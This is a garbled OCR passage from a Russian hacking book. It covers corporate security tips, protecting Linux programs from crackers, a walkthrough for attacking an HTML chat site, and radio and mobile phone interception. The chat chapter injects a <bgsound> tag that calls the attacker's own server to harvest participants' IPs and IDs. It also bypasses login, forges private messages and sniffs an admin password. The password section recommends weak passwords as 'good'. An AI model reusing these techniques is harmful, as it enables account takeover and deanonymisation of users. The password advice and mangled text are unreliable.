безопасности - диски, разбросанные на столе сотрудника, легко могут
пропасть.
Хсжерские трюки 215
3. Не допускайте, чтобы на одну сетевую станцию приходилось
более одного идентификатора пользователя. Установите безопасные эк-
ранные заставки - это поможет решить административные проблемы.
4. Предоставляйте корневые привилегии только тем администраторам,
которым они реально нужны. Помните, что каждый раз, когда вы
даете такие привилегии, в системе защиты появляется еще одна потенциальная
«дырка»..
5. Уничтожайте или сжигайте важную закрытую информацию:
списки персонала, идентификационные имена сотрудников, сводки отдела
кадров, папки с данными о клиентах, памятки, руководства, схемы
сетей и вообще все, что может представлять интерес для злоумышленников.
6. Мусорные контейнеры должны находиться на территории организации;
в противном случае злоумышленник не устоит перед соблазном
в них порыться.
7. Постарайтесь, чтобы сотрудники компании стали вашими союзниками
в борьбе за корпоративную безопасность. Попробуйте реализовать
программы партнерства: пообещайте вознаграждение тому, кто
обнаружит недочеты в системе безопасности или уличит кого-либо в недобросовестности
.
8. Внимательно изучайте все продукты, обеспечивающие информационную
безопасность. Убедитесь, что они работают именно так, как
было обещано производителем. Подумайте, можно ли укрепить систему
защиты, не устанавливая новый продукт, который потребует от вас определенных
усилий.
9. Уполномочьте кого-либо из сотрудников принимать оперативные
меры в случае угрозы информационной безопасности - от аварийной
остановки Web-сервера до вызова охраны для удаления проштрафившегося
сотрудника за пределы организации.
10. Оповестите сотрудников, что вы используете самые современные
средства мониторинга сети и контроля за действиями работников
компании. Объясните, что вы не собираетесь устанавливать тоталитарный
режим, а просто боретесь со злоумышленниками. В результате сотрудники
будут с меньшей легкостью нарушать правила пользования информационной
системой и обеспечения защиты данных.
216 Хакерские трюки
Пять основных условий обеспечения
информационной безопасности
1. Главное, что нужно сделать для защиты информационной системы
от внешних и внутренних угроз, - выработать корпоративную политику.
Обдумайте, чего вы хотите добиться и как можно достичь постав-
ленной цели; составьте ясный документ, посвященный политике
защиты.
2. Регулярно проводите занятия с сотрудниками, повышая их образовательный
уровень и степень информированности обо всех аспектах
информационной безопасности компании. Объясняйте сотрудникам, в
чем могло бы состоять их участие в обеспечении информационной безопасности
компании.
3. Периодически проводите тестирование и оценку системы защиты,
чтобы проверить, насколько внешняя и внутренняя защита соответствует
корпоративной политике. Работайте только с теми консультантами,
которые придерживаются структурированного подхода и не
заинтересованы напрямую в результатах тестирования.
4. Не забывайте о простых способах физической защиты. Следите
за доступом к распределительным шкафам, серверам, комнатам телефонной
связи и кроссам точно так же, как вы следите за доступом к вычислительным
центрам.
5. Рассмотрите вопрос об использовании услуг сторонних компаний,
специализирующихся в области защиты данных; они должны работать
в контакте с отделом автоматизации. Эти компании могут оказаться
лучше подготовленными к тому, чтобы следить за защитой ваших данных
24 часа в сутки без выходных. Однако тогда вам придется передать
в чужие руки управление определенной частью своего бизнеса.
Десять способов поддержки работоспособности
системы защиты
1. Время от времени проводите тестирование систем защиты - это
позволит отслеживать все изменения в самих системах, сетях и поведении
пользователей. Точечные проверки системы защиты данных предприятия
стоит проводить ежемесячно, а полную проверку информационной
безопасности предприятия - раз в год. Возможное влияние новых
приложений на информационную безопасность следует оценивать перед
их установкой.
2. Постоянно проверяйте надежность парольной защиты, даже если
ничто не внушает беспокойства. Длинные пароли лучше коротких,
Хакерские трюки 217
поскольку их труднее подобрать, однако их и труднее запомнить, не записывая.
Вот примеры хороших паролей: PaSsWoRd (чередующиеся
прописные и строчные буквы), ford6632 (распространенное слово и легко
запоминающееся число), 3lite, wrlt3m3, wlnnl3 (так пишут хакеры).
3. Следите за тем, как ваши пользователи работают с Internet, и регулируйте
этот процесс.
4. В рамках программы непрерывного образования предложите
сотрудникам ознакомиться со специальными играми и моделирующими
программами, которые позволят им осознать, какие последствия может
иметь пренебрежение правилами защиты данных.
5. За счет использования механизмов управления доступом и тех-
нологий для интрасетей разделите вашу организацию на логические части.
Секционирование ресурсов и информации повышает степень защищенности.
Подумайте также об использовании закрытой почтовой
системы, ограничивающей возможность обмена информацией между
сотрудниками.
6. Станьте подписчиками новостных групп Internet, посвященных
проблемам безопасности, и просматривайте основные Web-страницы;
это позволит вам постоянно быть в курсе событий. Вот некоторые полезные
URL: listservnetspace.org, wwwnbugtraq.com, wwwmfowar.com/hackers,
wwwtechbroker/happyhacker.html.
7. Немедленно устанавливайте все новые версии операционных
систем, «заплаты» к прикладным программам и комплекты сервисов,
выпускаемые производителем программного обеспечения. Тщательно
проверяйте, не окажет ли новая программа негативного воздействия на
другие системы.
8. Создайте из сотрудников вашей компании оперативную группу
компьютерной безопасности (Computer Emergency Response Team,
CERT). CERT - это общепринятый термин для обозначения группы
экспертов по компьютерным технологиям, которые призваны бороться с
компьютерными и сетевыми катастрофами. Установите контакты с группами
CERT из родственных организаций, что позволит поддерживать устойчивость
системы защиты в более глобальном масштабе.
9. Просматривайте списки прав доступа пользователей и следите
за их актуальностью. Ограничивайте пользователям возможности доступа;
максимально закручивайте все гайки в системе безопасности.
10. Рассматривайте защиту данных как процесс. Не следует думать,
что, установив систему защиты данных, можно поставить галочку в
списке необходимых дел и на этом успокоиться. Разработайте политику
218 Хакерские трюки
поддержания корпоративной информационной безопасности, которая
соответствовала бы потребностям вашего бизнеса.
Сигнал тревоги
В настоящее время ФБР расследует более 700 случаев крупных
вмешательств со стороны иностранных разведок. Среди применяемых
агентами методов - подключение к кабельным линиям связи, установка
подслушивающих устройств в офисах, перехват разговоров по сотовому
телефону, проникновение в компьютерные сети и воровство закрытой
информации с дисков и компакт-дисков.
По данным Национальной ассоциации компьютерной безопасности,
за период с 1996 г. по ноябрь 1997 г. количество макровирусов возросло
с 40 до 1300. Gartner Group предсказывает, что в 1998 г. 60% нарушений
системы защиты произойдет из-за вирусов.
Иностранные агенты минимум из 23 стран пытались осуществить
разведывательные действия против американских корпораций. По данным
ФБР, только в 1997 г. потери американских компаний, связанные
с интеллектуальной собственностью, составили свыше 300 млрд. дол.
По данным министерства обороны США, 88% из более чем 20 000
попыток проникновения в информационные системы государственных
организаций, выполненных для оценки надежности защиты, завершились
успешно. Из этих успешных нападений обнаружены были только
5%; официальные же доклады о проникновении представлялись только
в 5% от общего числа случаев выявления атак. Таким образом, широкой
общественности становится известно лишь об одной из 400 успешных
атак.
Как показало исследование, проведенное компанией Warroom
Research совместно с американским Сенатом, 58% компаний обнаруживали
случаи несанкционированного доступа к своим сетям. Более чем в
69% случаев успешных вторжений убытки компаний составили свыше
50 тыс. долларов, а более чем в 27% случаев - свыше 500 тыс. долларов.
Исследование, проведенное компанией Warroom Research, показало,
что каждая из более чем 51 % компаний уличала не менее шести своих
сотрудников в злоупотреблениях, связанных с информационными сетями.
Более чем в 75% случаев единственным наказанием стало устное
или письменное порицание.

Глава 19.
Защищаем Linux
Представим, что вы потратили кучу времени и ресурсов, разрабатывая
последние несколько месяцев неплохую программу, и даже отчего-
то имеете версию для Linux'a. Видимо, вы хотите окупить затраченные
усилия - проще говоря, заработать на своей программе кучу денег.
И если вы не опубликовали свой исходный код, в надежде заработать
другими способами, то необходимо как-то защитить вашу программу от
несанкционированного копирования. Т.е. программа должна работать
только у того, кто ее купил, и не должна работать (или работать неправильно,
или, что бывает чаще всего, иметь функциональные ограничения)
у халявщиков и крякеров. Проще говоря, чтобы ваш уникальный
алгоритм не смогли своровать.
Если разработке/снятию защит под DOS/Windows посвящено
множество сайтов, то практически невозможно найти ни одной работы,
посвященной тому же самому, но под Linux. Между тем уже имеется
множество коммерческих программ под эту, в общем, не самую плохую
из распространенных, OS. С прискорбием заметим, что вся их «защита»
составляет максимум 1 % от их Windows аналогов и снимается в худшем
случае за пару часов.
Постараемся объяснить, почему происходит именно так, почему
под Linux ом не работают многие традиционно используемые для защиты
Windows-программ способы, и, возможно, после прочтения этой главы
вы сможете придумать что-то действительно эффективное.
Итак, в чем же главное отличие Linux от прочих OS? В доступности
исходного кода всего (ну, кроме, разве что, вашей программы, стоящей
мегабаксы), что работает (или не работает) на вашей машине. Это
делает написание защиты под Linux просто кошмаром - вы не можете
быть уверены, что функция strcmp из стандартной run-time library - это
действительно strcmp, а не ее измененный (обычно не в вашу пользу)
эмулятор.
Вы не можете доверять ничему в такой операционной системе -
вследствие доступности исходного кода любая ее часть может быть модифицирована
крякером для взлома вашей программы, включая такие
важнейшие компоненты, как ядро и run-time library. Ваша программа
работает в самой агрессивной среде, какую только можно себе представить.
В самом деле, если бы вы могли изменить в Windows 9x, скажем,
kernel32.dll (имеется в виду не ковыряние в машинном коде с помощью
дизассемблера, хотя возможно использовать и такой метод - нет, про-
228 Хакерские трюки
сто редактирование исходного кода и последующая перекомпиляция)
- разве было бы возможно существование защит вроде VBox?
А пока для вас плохие новости - ваша программа обязательно будет
сломана. Это на самом деле чисто экономический вопрос. Представим,
что ваш программный продукт стоит 1000$. Среднемесячная зарплата
неплохого программиста из нашей страны едва ли составляет 200$..
Таким образом, если какой-нибудь парнишка из Сибири затратит на
слом вашего творения меньше 5 месяцев - он будет экономически выгоден.
Заметьте, что здесь ни слова не было сказано ни об операционной
системе, под которой работает ваш шедевр, ни о сложности и стоимости
использованной системы защиты.
Что же делать - идти в монастырь (хотя в женский иногда наведываться
- наверное, неплохая идея)? Вы должны рассматривать защиту
своего программного продукта не как 100% средство от ваших головных
болей, а всего лишь как средство, затрудняющее жизнь крякеру.
Скажем, если ваша защита остановит 9 крякеров из 10 - это очень неплохой
результат. Конечно, не все 9 остановленных купят вашу программу,
но их будет явно больше, чем для случая, когда ваша зашита
сломана 9-ю из 10.
Итак, довольно пустых разговоров. Для начала сделаем краткий
обзор применяемых крякерами инструментов (хотя вполне возможно
рассматривать Linux как один большой инструмент крякера).
Отладчики
GDB
Отладчик userlevel mode. Загружает файлы с помощью BFD.
Что-то вроде старого недоброго debug из DOSa. Также оформлен как
библиотека. К нему есть множество интерфейсов, наиболее удобный для
X Windows, IMHO, DDD (требует LessTif). Также заслуживает отдельного
упоминания SmartGDB. Крайне интересная идея прибить сбоку отладчика
script engine. Вещь очень любопытная с точки зрения автоматизации
труда крякера - вы можете написать script, который посадить
затем как триггер на точку останова. Ваш script смог бы, например, проверить
переменные в отлаживаемой программе, и в зависимости от их
значения, например, поставить новую точку останова (с новым scriptOM),
сбросить кусок памяти в файл, сваритькакаву...
Kernel level debugger
от все той же SGI. Пока крайне сырая вещь (и требует нестабильной
версии кернела), но может служить прототипом для более пригод-
ных к использованию изделий.
Хакерские трюки 229
Дизассемблеры
Без сомнения, IDA Pro. Также иногда можно на скорую руку использовать
Biew, objdump (или даже ndisasm, дизассемблер от Netwide
Assembler), но это несерьезно. Более неизвестны инструменты, которые
позволяют дописывать к ним новые процессорные модули, загрузчики
для нестандартных форматов файлов, а также plugins, облегчающие автоматический/
интерактивный анализ.
strace
или trass под UnixWare. Аналог regmon/filemon/BoundsChecker
в одном флаконе. Ядро Linuxа имеет поддержку перехвата системных
вызовов (функция ptrace). Т.е. можно запустить любой процесс как подлежащий
трассировке через ptrace, и вы сможете отследить все системные
вызовы с их параметрами. Более того, после небольшой модификации
эта функция (которая имеет доступ к виртуальной памяти
трассируемого процесса) может быть использована, например, для
run-time patching, внедрения кода в адресное пространство любого процесса,
и так далее, и тому подобное.
ptrace
Менее надежное, но более простое в реализации средство. Можно
вызвать ptrace для самого себя. Если вызов был неудачен - значит, нас
уже трассируют, нужно сделать что-нибудь по этому поводу (sys_exit, например).
Впрочем, ведь если нас уже трассируют, ничего не стоит перехватить
данный вызов и вернуть все что угодно...
Memory dumpers
Файловая система /ргос может использоваться для таких целей.
Файл maps используется как карта выделенной процессу виртуальной
памяти, а файл mem является ее отображением, можно сделать в нем seek
на нужный адрес и легко сохранить необходимый участок в файл или ку-
да-вы-там-хотите. Простая программа на Perl размером 30 строчек может
быть использована для снятия дампа памяти вашей драгоценной
программы и сохранения ее в файл. Намного проще, чем под Win32.
Шестнадцатеричные редакторы
С этим тоже никогда не было больших проблем. Даже стандартный
просмотревших Midnight (или Mortal, его второе имя) Comandera
умеет редактировать в шестнадцатеричном представлении. Для гурманов
рекомендуем Biew.
230 Хакерские трюки
Стандартные средства разработки
Для модификации ядра/runtime библиотек (а также для создания
patch-ейи keygen-ов) нужен как минимум компилятор «С».
Способы защиты
Итак, надеемся, вы еще не уснули и не впали в депрессию. Что же
можно противопоставить всему вышеописанному ? Явно годятся далеко
не все методы, используемые в Win32. Тем не менее, представим несколько...
Против BFD (GDB,objdump,strings иT.A.)
BFD - это библиотека для манипуляций с бинарными файлами.
По счастливому стечению обстоятельств она используется также отладчиком
GDB. Но для ELF-формата (наиболее распространенный формат
исполнимых файлов под всеми современными итх'ами) она реализует
неправильный алгоритм загрузки. Для этого можно использовать sstrip
или ELF.compact (собственно, они делают одно и то же).
Преимущества:
Очень простой метод. Берете вашу готовую отлаженную программу
и вместо команды strip запускаете elf_compact (или sstrip).
Помимо всего прочего, вы уменьшите размер вашего дистрибутива.
Хотя, глядя на размеры современных дистрибутивов Linux а, этот аргумент
кажется просто смешным... на этом преимущества заканчиваются
и начинаются...
Сплошные недостатки:
Поскольку исходники BFD публично доступны, теоретически любой
может доработать этот замечательный пакет, так что шансы снова
будут не в вашу пользу. Собственно, вы должны помнить, что в Linux'e
это относится ко всему. Но пока этот метод работает.
Данный вариант может рассматриваться как очень простая защита
от полных ламеров, rating 0,1%.
Компрессия/шифрование кода программы
Самый распространенный метод защиты под Win32. Под Linux" ом
этот метод имеет некоторые особенности. Самое большое отличие в том,
как разрешаются ссылки на внешние модули.
Хакерские трюки 231
Статическаялинковка
Не имеющий аналогов под Win32 метод. При сборке программы
все используемые ею библиотеки просто статически линкуются в один
большой толстый модуль. Т.е. для запуска такой программы ничего дополнительно
делать не нужно - такая программа самодостаточна.
Преимущества:
Большую программу ломать труднее, чем маленькую.
Независимость от среды исполнения. В самом деле, довольно часто
возникают конфликты версий, установленных на машине конечного
пользователя библиотек, из-за чего ваша программа может просто не работать.
В случае статически слинкованной программы такие проблемы
устраняются (а точнее, просто не возникают).
Устранение (хотя и не 100%) возможности перехвата и эмуляции
библиотечных вызовов. В такой программе вы будете несколько более
уверены, что при вызове, скажем, strcmp будет вызвана ваша статически
слинкованная функция strcmp, а не неизвестно что. Хотя в Linux никогда
и ни в чем нельзя быть уверенным до конца.
Недостатки:
Увеличение размера программ.
Если вы думаете, что таким образом сможете затруднить жизнь
крякеру, вы глубоко ошибаетесь. С помощью технологии FLAIR, используемой
в IDA Pro, а также применив инструмент RPat для создания
сигнатур исходных библиотек (использованных вами при статической
линковке), все ваши библиотечные функции могут быть легко опознаны.
Более того, обычно не составляет большого труда выяснить, какие именно
библиотеки используются, собрать их и сделать файлы сигнатур.
Rating: 0.1%.
Возможно, что кто-нибудь станет утверждать, что статическая
линковка-де увеличивает необходимые ресурсы и что якобы разделяемые
библиотеки разделяют сегмент кода между всеми процессами, использующими
их. То же самое утверждает большинство учебников по
Unix, но это не так. Самое простое доказательство - просмотр атрибутов
сегментов памяти, занимаемых разделяемыми библиотеками (файл maps
в файловой системе /ргос). Вы почти никогда не увидите атрибута
s(hared). Почему? Короткий ответ звучит так - из-за ELF. Дело в том,
что при загрузке ELF-файла происходит настройка его перемещаемых
адресов - relocations. При этом сегменту памяти (даже если это сегмент
кода) присваиваются атрибуты Read/Write и если он при этом разделялся
несколькими процессами, происходит копирование памяти при запи-
232 Хакерские трюки
си. Таким образом, разделение сегментов кода между процессами возможно
только между родителем и его потомками (как результат функции
fork). Эти же аргументы применимы и к утверждению, что якобы «упаковка
кода программы приводит к увеличению ресурсов, необходимых
для запуска такой программы».
Динамическая линковка
Под Win32 все программы являются динамически слинкованны-
ми как минимум с системными .DLL, реализующими API. Более того,
такая линковка осуществляется опять же самой системой с помощью все
тех же функций API. Под Linux'oM все по-другому. Во-первых, программе
совершенно не обязательно быть динамически слинкованной.
Во-вторых, программа сама должна заботиться о загрузке всех необходимых
модулей и динамическом разрешении ссылок. Это, правда, вовсе не
означает, что вам каждый раз придется писать код загрузки модуля в память.
Среда исполнения (а не kernal - как в Win32) предоставляет реализацию
динамического загрузчика по умолчанию - в терминах Linux его
называют ELF interpreter, или просто interpreter. При линковке в программу
помещается информация, что для ее запуска необходимо после
загрузки самой программы также загрузить interpreter и передать ему управление.
На этом загрузка файла на исполнение с точки зрения кернела
заканчивается. Но ваши головные боли только начинаются! Итак, чем
плох стандартный ELF interpreter?
Тем же, чем и весь Linux, - его исходники доступны, соответственно,
он может быть легко изменен для достижения неизвестных вам
целей.
Он поддерживает уникальный для Unix ов механизм предварительной
загрузки. Рассмотрим его подробнее. Итак, предположим, что
ваша программа импортирует функцию strcmp. Злобный крякер может
написать собственную реализацию этой функции, создать объектный
модуль и использовать ее вместо той, что вы ожидали! Для этого всего
лишь нужно определить переменную среды LD_PRELOAD, чтобы она
содержала список модулей, подлежащих загрузке перед модулями, импортируемыми
вашей программой. Логика работы interpreter^ такова,
что еслинекая импортируемая функция уже разрешена, то она больше не
разрешается (в Linux импорт происходит по имени, а не по имени и имени
библиотеки, как в Win32). Таким образом, можно штатными средствами
внедрить в адресное пространство вашей программы все, что
угодно, заменив при этом любую импортируемую функцию. Похоже на
ночной кошмар, не так ли? Вы все еще думаете, что Linux написали не
крякеры?
Хакерские трюки 233
С стандартным interpretor'oM есть и еще одна проблема. Дело
в том, что его легко можно переписать для универсального инструмента,
отслеживающего все вызовы импортируемых функций. Была идея встроить
script engine в ELF interpreter, так что больше не нужно будет переписывать
его под каждую конкретную программу, а всего лишь заменить
script, который и сделает все, что нужно. Ведь ELF interpreter работает в
адресном пространстве вашей программы, и он отвечает за начальную
загрузку импортируемых функций, т.е. фактически такой script будет
иметь над вашей программой полный контроль (под Win32 вообще неизвестны
подобные инструменты. BoundsChecker, конечно, может отслеживать
все вызовы импортируемых функций, но пока никому не пришла
мысль дописать к нему script engine и использовать, например, для memory
patching).
Если после прочтения предыдущего абзаца вы все еще не выбросились
из окна - есть для вас и хорошие мысли. Итак, что могут противопоставить
авторы защиты? Собственный загрузчик в кернеле. Можно
просто переписать стандартный загрузчик ELF-файлов (файл
binfmt_elf.c из директории fs исходников ядра Linux), чтобы сделать
жизнь крякера несколько тяжелее. Например, сбрасывать флаг трассировки
процесса, иметь собственный формат исполнимых файлов (естественно,
вместе с перекодировщиком обычных ELFOB в этот формат),
декриптовать/декомпрессировать куски файла перед загрузкой их в память
и т.д. Недостатки: как ни странно, самым большим недостатком
является необходимость иметь собственный код в кегпеГе. Поскольку у
конечного пользователя, что вполне естественно, время от времени возникает
необходимость в пересборке кернела, вы должны будете предоставить
либо объектный модуль (для насмерть прибитого гвоздями в кер-
нел кода), или опять объектный модуль (для LKM -- Linux Kernal
Module). И то, и другое легко можно дизассемблировать/пропатчить,
и история повторяется...
Как насчет смены версии кернела? Например, грядет смена ядра
2.2 на 2.4 - нужно будет иметь (и поддерживать!) как минимум код для
обеих версий ядра...
А если вы допустите ошибку? Если для userlevel-программ ваши
ошибки, скорее всего, не смертельны, то ошибки в коде кернела могут
иметь весьма плачевные последствия. Кроме того, отладка такого кода
является сущим кошмаром, поверьте...
Субъективная причина - сложность установки. Но при всех недостатках
- это вполне приемлемый вариант.
234 Хакерские трюки
Глава 20.
Взлом html-чатов
Предполагается, что читатель знает, что такое CGI, и на этом мы
построим свое объяснение.
В любом чате фрейм, в котором вы пишете сообщения, генерится
динамически (для каждого входящего) и, возможно, содержит несколько
скрытых полей. Типа <input type=hidden name=cookie value=SP202134>
(так хранится UserlD).
Идея в следующем: сохраняем содержимое этого фрейма на диске
и исправляем его так, чтобы можно было с ним работать со своего винта.
Т.е. заменяем ссылки типа /cgi-bin/refresh.pl на полный путь
wwwchat.nsk.su/cgi-bin/refresh.pl и вместо скрытых полей формы пишем
типа <input type=text name=cookie value=SP202134> (что бы можно было
их изменять) После этого делаем HTML документ для «сборки чата» из
кусков. Т.е. примерно так:
"First.htm"
<html>
<frameset rows="80%,20%">
<frameset cols="70%,30%">
<frame name="razg" src="http://www.chat.nsk. su/cgibin/
refresh.cgi?win+razgovor+nocookie#end">
<frame name="rigt" src="http://www.chat.nsk.su/right.html">
</frameset>
<frame name="bot" src="start.htm">
</frameset>
</html>
Start.htm - это и есть тот фрейм, который мы сохранили и изменили.
После этого просто браузером открываем страницу (Fim.htm).
И сразу(!!!) попадаем в чат, минуя стандартную процедуру входа.
Это позволит:
1. Обходить зарегистрированные имена.
2. Прятать свой IP от киллеров за счет взятия чужого ID'a.
Дальше интересно вычислить IP участников. Если не запрещен
тэг <bgsound src="">, то это позволит вставлять в свое сообщение ресурс
со своей машины. Сам по себе звук не нужен, но этот косяк позволил
вставить в свой месс строку типа <bgsound src="http://MyIP/cgi-bm/
Хакерские трюки 235
spy.exe">. Этот скрипт (spy.exe) вызывался с машины каждого участника
чата. Это позволит увидеть IP всех (скрипт просто сохраняет на винт данные
из переменной окружения REMOTE_ADDR). Примерно в это же
время в чате появились приваты. Это значит, что документ в главном
фрейме (тот, где мессы все) стал называться по-другому.
До приватов:
http://www.chat.nsk.su/cgi-bin/refresh. … zgovor#end
После появления приватов:
http://www.chat.nsk.su/cgibin/
ref resh .cgi?win+razgovor+SP345678#end
Где SP456789 - UserlD.
После этого в скрипт (spy.exe) был добавлен вывод ID'a из переменной
окружения HTTP_REFERER. Ну, а сопоставить ник с ГО'ом не
проблема, т.к. ID каждого прописан там же примерно в такой строке
<br><b><font color=yellowsize=-1>TyT ник-c/fontx/t»
<font color=blackxa href="/cgi-bin/private_form.cgi?SP448188">
<img src=/img/mes.gif border=0 vspace=0></a></font>
(Эта строка взята из правого фрейма, где можно вызвать функцию
«Кто в чате»).
После этого перестало быть проблемой сопоставление ника и IP.
Затем можно позабавиться с приватами.
Используя метод сохранения странички на винт, можно получить
форму для отправления приватов от кого-то кому-то. Т.е. можно в отсылаемом
приватно сообщении проставлять имя отправителя.
Осталось только одно. Известно, что в чате есть киллеры, но ничего
не известно про то, что это, где это, как это. Известно только, что для
того, чтобы киллерствовать, надо зайти на какую-то страничку. Очевидно,
что в этой киллерской страничке показываются имена. Предположим,
что имя показывается таким, каким его вводить. Исходя из этого,
под именем <bgsoundsre="http://MyIP/cgi-bin/spy.exe"> MyNick зашел в
чат (через прокси) и начал легонько ругаться (надо было, чтобы киллеры
зашли на свою страничку). После этого, изучив лог нашего ВебСервера
(OmniHTTPd beta), можно увидеть там обращение со страницы, не относящейся
к известным нам страницам чата. Лезем на эту страницу и получаем
запрос на ввод пароля, со словами «Дорогой администратор...». Это
приятно греет душу. Дальше можно подобрать пароль или еще что придумать.
Но ситуация сложилась так, что мы оказались в одной сети с киллером,
и, запустив сниффер, мы получаем пароль.

Глава 23.
Мобильная связь
Такуж устроен мир, что любое техническое изобретение человеческого
разума, расширяющее наши возможности и создающее для нас дополнительный
комфорт, неизбежно содержит в себе и отрицательные
стороны, которые могут представлять потенциальную опасность для
пользователя. Не являются исключением в этом плане и современные
средства беспроводной персональной связи. Да, они несоизмеримо расширили
нашу свободу, «отвязав» нас от телефонного аппарата на рабочем
столе и дав нам возможность в любое время и в любом месте связаться
с необходимым корреспондентом. Но немногие знают, что эти «чудеса
техники» скрывают в себе весьма опасные «ловушки». И для того, чтобы
однажды ваш помощник - скажем, сотовый телефон - не превратился
в вашего врага, эти «ловушки» следует хорошо изучить.
Чтобы лучше понять проблемы, связанные с использованием беспроводных
средств связи, давайте вспомним, что эти средства из себя
представляют и как работают.
Современные беспроводные средства персональной связи включают
в себя мобильные телефоны сотовой связи, пейджеры и беспроводные
стационарные радиотелефоны.
Мобильные телефоны сотовой связи фактически являются сложной
миниатюрной приемо-передающей радиостанцией. Каждому сотовому
телефонному аппарату присваивается свой электронный серийный
номер (ESN), который кодируется в микрочипе телефона при его изготовлении
и сообщается изготовителями аппаратуры специалистам, осуществляющим
его обслуживание. Кроме того, некоторые изготовители
указывают этот номер в руководстве для пользователя. При подключении
аппарата к сотовой системе связи техники компании, предоставляющей
услуги этой связи, дополнительно заносят в микрочип телефона
еще и мобильный идентификационный номер (MIN).
Мобильный сотовый телефон имеет большую, а иногда и неограниченную
дальность действия, которую обеспечивает сотовая структура
зон связи. Вся территория, обслуживаемая сотовой системой связи, разделена
на отдельные прилегающие друг к другу зоны связи, или «соты».
Телефонный обмен в каждой такой зоне управляется базовой станцией,
способной принимать и передавать сигналы на большом количестве радиочастот.
Кроме того, эта станция подключена к обычной проводной
телефонной сети и оснащена аппаратурой преобразования высокочастотного
сигнала сотового телефона в низкочастотный сигнал проводно-
Хакерские трюки 253
го телефона и наоборот, чем обеспечивается сопряжение обеих систем.
Периодически (с интервалом 30-60 минут) базовая станция излучает служебный
сигнал. Приняв его, мобильный телефон автоматически добавляет
к нему свои MIN- и ESN-номера и передает получившуюся кодовую.
комбинацию на базовую станцию. В результате этого осуществляется
идентификация конкретного сотового телефона, номера счета его владельца
и привязка аппарата к определенной зоне, в которой он находится
в данный момент времени.
Когда пользователь звонит по своему телефону, базовая станция
выделяет ему одну из свободных частот той зоны, в которой он находится,
вносит соответствующие изменения в его счет и передает его вызов по
назначению. Если мобильный пользователь во время разговора перемещается
из одной зоны связи в другую, базовая станция покидаемой зоны
автоматически переводит сигнал на свободную частоту новой зоны.
Пейджеры представляют собой мобильные радиоприемники с устройством
регистрации сообщений в буквенном, цифровом или смешанном
представлении, работающие, в основном, в диапазоне 100-400 МГц.
Система пейджинговой связи принимает сообщение от телефонного
абонента, кодирует его в нужный формат и передает на пейджер вызываемого
абонента.
Стационарный беспроводный радиотелефон объединяет в себе
обычный проводный телефон, представленный самим аппаратом, подключенным
к телефонной сети, и приеме-передающее радиоустройство
в виде телефонной трубки, обеспечивающей двусторонний обмен сигналами
с базовым аппаратом. В зависимости от типа радиотелефона, дальность
связи между трубкой и аппаратом, с учетом наличия помех и переотражающих
поверхностей, составляет в среднем до 50 метров.
Проблема безопасности при пользовании сотовым телефоном
и другими мобильными средствами персональной беспроводной связи
имеет два аспекта: физическая безопасность пользователя и безопасность
информации, передаваемой с помощью этих устройств. Здесь сразу
следует оговориться, что угрозу физической безопасности создает
только мобильный сотовый телефон, так как пейджеры и стационарные
радиотелефоны являются не излучающими или слабо излучающими устройствами
и характеризуются отличными от сотовых телефонов условиями
и порядком пользования.
Проблема защиты информации
Вы, наверное, не раз слышали рекламу компаний, предоставляющих
услуги сотовой связи: «Надежная связь по доступной цене!». Давайте
проанализируем, действительно ли она так уж надежна. С технической
254 Хакерские трюки
точки зрения - да. А с точки зрения безопасности передаваемой информации?
В настоящее время электронный перехват разговоров, ведущихся
по сотовому или беспроводному радиотелефону, стал широко распространенным
явлением.
Так, например, в Канаде, по статистическим данным, от 20 до 80%
радиообмена, ведущегося с помощью сотовых телефонов, случайно или
преднамеренно прослушивается посторонними лицами.
Электронный перехват сотовой связи не только легко осуществить,
он, ктому же, не требует больших затрат на аппаратуру, и его почти
невозможно обнаружить. На Западе прослушивание и/или запись разговоров,
ведущихся с помощью беспроводных средств связи,
практикуют правоохранительные органы, частные детективы, промышленные
шпионы, представители прессы, телефонные компании, компьютерные
хакеры и т.п.
В западных странах уже давно известно, что мобильные сотовые
телефоны, особенно аналоговые, являются самыми уязвимыми с точки
зрения защиты передаваемой информации.
Принцип передачи информации такими устройствами основан
на излучении в эфир радиосигнала, поэтому любой человек, настроив
соответствующее радиоприемное устройство на ту же частоту, может услышать
каждое ваше слово. Для этого даже не нужно иметь особо сложной
аппаратуры. Разговор, ведущийся с сотового телефона, может быть
прослушан с помощью продающихся на Западе программируемых сканеров
с полосой приема 30 кГц, способных осуществлять поиск в диапазоне
860-890 МГц. Для этой же цели можно использовать и обычные
сканеры после их небольшой модификации, которая, кстати, весьма по-
дробно описана в Internet'e. Перехватить разговор можно даже путем
медленной перестройки УКВ-тюнера в телевизорах старых моделей в
верхней полосе телевизионных каналов (от 67 до 69), а иногда и с помощью
обычного радиотюнера. Наконец, такой перехват можно осуществить
с помощью ПК.
Легче всего перехватываются неподвижные или стационарные сотовые
телефоны, труднее - мобильные, так как перемещение абонента в
процессе разговора сопровождается снижением мощности сигнала и переходом
на другие частоты в случае передачи сигнала с одной базовой
станции на другую.
Более совершенны с точки зрения защиты информации цифровые
сотовые телефоны, передающие информацию в виде цифрового кода.
Хакерские трюки 255
Однако используемый в них алгоритм шифрования Cellular Message
Encryption Algorithm (CMEA) может быть вскрыт опытным специалистом
в течение нескольких минут с помощью персонального компьютера.
Что касается цифровых кодов, набираемых на клавиатуре цифрового
сотового телефона (телефонные номера, номера кредитных карточек или
персональные идентификационные номера PIN), то они могут быть легко
перехвачены с помощью того же цифрового сканнера.
Не менее уязвимыми с точки зрения безопасности информации
являются беспроводные радиотелефоны. Они при работе используют две
радиочастоты: одну - для передачи сигнала от аппарата к трубке (на ней
прослушиваются оба абонента), другую - от трубки к аппарату (на ней
прослушивается только абонент, говорящий в эту трубку). Наличие двух
частот еще больше расширяет возможности для перехвата.
Перехват радиотелефона можно осуществить с помощью другого
радиотелефона, работающего на тех же частотах, радиоприемника или
сканнера, работающих в диапазоне 46-50МГц. Дальность перехвата, в зависимости
от конкретных условий, составляет в среднем до 400 метров, а
при использовании дополнительной дипольной антенны диапазона
46-49 МГц-до 1,5км.
Следует отметить, что такие часто рекламируемые возможности
беспроводного телефона, как «цифровой код безопасности» (digital security
code) и «снижение уровня помех» (interference reduction), нисколько
не предотвращают возможность перехвата разговоров. Они только препятствуют
несанкционированному использованию этого телефона и не
дают соседствующим радиотелефонам звонить одновременно. Сложнее
перехватить цифровые радиотелефоны, которые могут использовать при
работе от 10 до 30 частот с автоматической их сменой. Однако и их перехват
не представляет особой трудности при наличии радиосканера.
Такими же уязвимыми в отношении безопасности передаваемой
информации являются и пейджеры. В большинстве своем они используют
протокол POSCAG, который практически не обеспечивает защиты от
перехвата. Сообщения в пейджинговой системе связи могут перехватываться
